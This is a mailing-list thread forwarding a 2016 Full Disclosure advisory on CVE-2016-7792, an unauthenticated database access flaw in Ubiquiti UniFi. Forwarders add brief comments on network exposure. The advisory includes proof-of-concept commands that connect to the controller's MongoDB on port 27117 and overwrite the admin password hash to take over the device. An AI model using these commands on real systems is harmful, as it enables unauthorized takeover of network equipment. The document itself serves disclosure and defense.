People do all kinds of things for all kinds of (dumb) reasons.
The controller's db would not be accessible on the internet, but any
wifi user might be able to do the exploit unless you take measures to
prevent it.
------ Original Message ------
From: "Paul Stewart" <p...@paulstewart.org>
To: "Animal Farm" <af@afmug.com>
Sent: 10/3/2016 4:10:28 AM
Subject: [AFMUG] Fwd: [FD] Critical Vulnerability in Ubiquiti UniFi
Don’t have time to test this out but thought I’d pass this along ….
My first thought is why anyone would have their ports exposed across
the internet to allow this to happen, if it’s possibly true….
Paul
Begin forwarded message:
From: Tim Schughart <t.schugh...@prosec-networks.com>
Subject: [FD] Critical Vulnerability in Ubiquiti UniFi
Date: September 30, 2016 at 5:49:26 AM EDT
To: fulldisclos...@seclists.org, bugt...@securityfocus.com,
webapp...@securityfocus.com
Cc: "Khanh Quoc. Pham" <k.p...@prosec-networks.com>
Hello @all,
together with my colleague we found two uncritical vulnerabilities
you'll find below.
Product: UniFi AP AC Lite
Vendor: Ubiquiti Networks Inc.
Internal reference: ? (Bug ID)
Vulnerability type: Incorrect access control
Vulnerable version: Unify 5.2.7 and possible other versions affected
(not tested)
Vulnerable component: Database
Report confidence: yes
Solution status: Not fixed by Vendor, the bug is a feature.
Fixed versions: -
Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of
ProSec Networks
Solution date: -
Public disclosure: 2016-09-30
CVE reference: CVE-2016-7792
CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vulnerability Details:
You are able to connect to the access points database, because of an
broken authentication (OWASP TOP10). So you are able to modify the
database and read the data. An possible scenario you'll find in PoC
section.
Risk:
An attacker gets access to the database and for e.g. is able to change
the admins password, like you see in PoC below.
PoC:
1. Generate SHA512 Hash with e.g.
mkpasswd -m sha-512
2. Connect via network to database, e.g. :
mongo --port 27117 --host target_ip
3. Change password via command
"db.admin.update({"name":"ProSec"}, {$set : {"x_shadow":
"$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})"
4. Login via web interface with new password
Best regards / Mit freundlichen Grüßen
Tim Schughart
CEO / Geschäftsführer
--
ProSec Networks e.K.
Ellingshohl 82
56077 Koblenz
Website: https://www.prosec-networks.com
E-Mail: t.schugh...@prosec.networks.com
Mobile: +49 (0)157 7901 5826
Phone: +49 (0)261 450 930 90
"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or
LEGALLY PROTECTED information and is intended only for the named
recipient(s). Any unauthorized use, dissemination, copying or
forwarding is strictly prohibited. If you are not the intended
recipient and have received this email communication in error, please
notify the sender immediately, delete it and destroy all copies of
this E-Mail. VAT ID: DE290654714 legal domicile Koblenz, HRA 21625.“
"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS
UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten
und ist ausschließlich für den/die genannten Adressaten bestimmt. Jede
unbefugte Nutzung, Weitergabe, Vervielfältigung oder Versendung ist
strengstens verboten. Sollten Sie nicht der angegebene Adressat sein
und diese E-Mail Mitteilung irrtümlich erhalten haben, informieren Sie
bitte sofort den Absender, löschen diese E-Mail und vernichten alle
Kopien. USt-IdNr.: DE290654714, Amtsgericht Koblenz, HRA 21625."
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
